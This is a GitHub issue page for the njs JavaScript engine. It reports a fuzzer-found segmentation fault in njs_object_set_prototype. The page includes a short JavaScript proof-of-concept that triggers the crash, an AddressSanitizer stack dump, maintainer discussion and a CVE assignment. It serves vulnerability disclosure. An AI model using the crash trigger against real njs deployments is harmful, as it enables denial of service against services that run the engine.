Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SEGV /njs/src/njs_object.c:2136:24 in njs_object_set_prototype #449

Closed
anonym0us1337 opened this issue Dec 24, 2021 · 2 comments
Closed
Assignees

Comments

@anonym0us1337
Copy link

Env

Version    : 0.7.0
Git Commit : 2da5d8b246b806bee6f74b575217ec3b61a25548
OS         : Ubuntu 20.04
Configure  : ./configure --address-sanitizer=YES

POC

function main() {
    const v3 = [23490,23490,23490,23490];
    const v4 = {};
    v3.length = 1577595327;
    const v9 = Object.apply(...v4,v3);
    v3.__proto__ = v9;
}
main();

Stack Dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==466519==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x00000050d6d4 bp 0x7ffc8e2432f0 sp 0x7ffc8e2432e0 T0)
==466519==The signal is caused by a READ memory access.
==466519==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
    #0 0x50d6d4 in njs_object_set_prototype /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2136:24
    #1 0x50d6d4 in njs_object_prototype_proto /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2162:19
    #2 0x4d9f03 in njs_value_property_set /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_value.c:1215:19
    #3 0x4e45f5 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:658:23
    #4 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11
    #5 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23
    #6 0x4dea17 in njs_vm_start /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vm.c:493:11
    #7 0x4c7f3d in njs_process_script /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:881:19
    #8 0x4c7375 in njs_process_file /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:615:11
    #9 0x4c7375 in main /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:315:15
    #10 0x7f3d5b6190b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #11 0x41dabd in _start (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x41dabd)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2136:24 in njs_object_set_prototype
==466519==ABORTING

Credit

P1umer, afang5472, Kotori of NeSE@IIE

@drsm
Copy link
Contributor

drsm commented Dec 24, 2021

maybe related:

>> (() => {}).apply({}, Array(2**10));
undefined
>> (() => {}).apply({}, Array(2**13));
Thrown:
RangeError: Maximum call stack size exceeded
    at Function.prototype.apply (native)
    at main (shell:1)

>> (() => {}).apply({}, Array(2**30));
undefined
>> (() => {}).apply({}, Array(2**32));
Thrown:
RangeError: Invalid array length
    at Array (native)
    at Function.prototype.apply (native)
    at main (shell:1)

@xeioex xeioex removed the fuzzer label Jan 18, 2022
@xeioex xeioex self-assigned this Jan 18, 2022
@xeioex xeioex added the fuzzer label Jan 18, 2022
@P1umer
Copy link

P1umer commented Feb 15, 2022

This issue was assigned CVE-2021-46462.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

4 participants